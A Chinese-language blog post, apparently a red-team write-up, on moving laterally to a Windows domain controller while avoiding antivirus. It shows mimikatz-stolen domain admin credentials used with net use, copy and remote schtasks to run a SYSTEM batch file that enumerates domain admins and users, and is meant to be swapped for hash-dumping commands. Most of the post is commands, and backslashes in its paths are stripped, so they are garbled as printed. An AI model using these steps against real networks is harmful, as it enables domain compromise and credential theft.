无需免杀获取域控hash小技巧

2021-09-17 17:12:40 浏览数 (2)

  • 当前被控机器存在MS 诺顿,本来想直接利用出网机器 CS做个免杀然后一把梭,奈何域控环境有些苛刻:多个国际杀软 不出网,故而才有此文

前言

环境

  • Microsoft Windows Server 2016 Standard
  • Microsoft Security Essentials Norton Kaspersky
  • Psexec 、WMIHACKER等都利用失败

mimikatz进行免杀后抓取出网机器中的明文及Hash信息,恰好域管曾登录过这台机器,利用抓取到的域管信息去连接域控机器。

尽可能的减少动作,对psexec、WMIHACKER等常见方式进行利用发现均失败

故而使用被遗忘的技能

  • net useschtasks计划任务组合

测试过程

建立连接

net use \192.168.42.8 /u:xsgcsadministrator xsgcs

查看目标开放的共享

net view \192.168.42.8

只有域控才会有下面两个共享目录:

代码语言:javascript复制
NETLOGON      Disk          Logon server share

SYSVOL        Disk          Logon server share

dir 命令

dir \192.168.42.8c$

删除连接

net use \192.168.42.8 /del /y

copy 命令

  • 将当前目录下的1.txt文件拷贝到域控机器

copy 1.txt \192.168.42.8c$

  • 将域控机器上的xsgcs.txt拷贝到本地

copy \192.168.42.8c$xsgcs.txt

type 命令

  • 查看xsgcs.txt文件内容

type \192.168.42.8c$xsgcs.txt

计划任务执行命令 高版本中at命令不适用

  • 创建计划任务名为xsgcsschtasks /create /tn xsgcs /U xsgcsadministrator /P xsgcs /tr C:Userssystem.bat /sc ONSTART /s 192.168.42.8 /RU system
  • 执行计划任务xsgcsschtasks /run /tn xsgcs /s 192.168.42.8 /U xsgcsadministrator /P xsgcs
  • 删除计划任务xsgcsschtasks /F /delete /tn xsgcs /s 192.168.42.8 /U xsgcsadministrator /P xsgcs
  • system.bat内容 此处举例说明
代码语言:javascript复制
whoami >> c:Users1.txt
net user >> c:Users1.txt
systeminfo >> c:Users1.txt
tasklist /svc >> c:Users1.txt
net group "domain admins" /domain >> c:Users1.txt
net user /domain >> c:Users1.txt

也可进行自定义,将计划任务写入system.bat中执行

最后再按照我之前写的利用ProxyShell漏洞获取域控所有Hash文章里面导出域控hash的方式将命令替换到bat文件里面即可。

备注:

1.上传的任何文件都需要在前面添加绝对路径

2.如果当前路径无权限可尝试更换其他路径

0 人点赞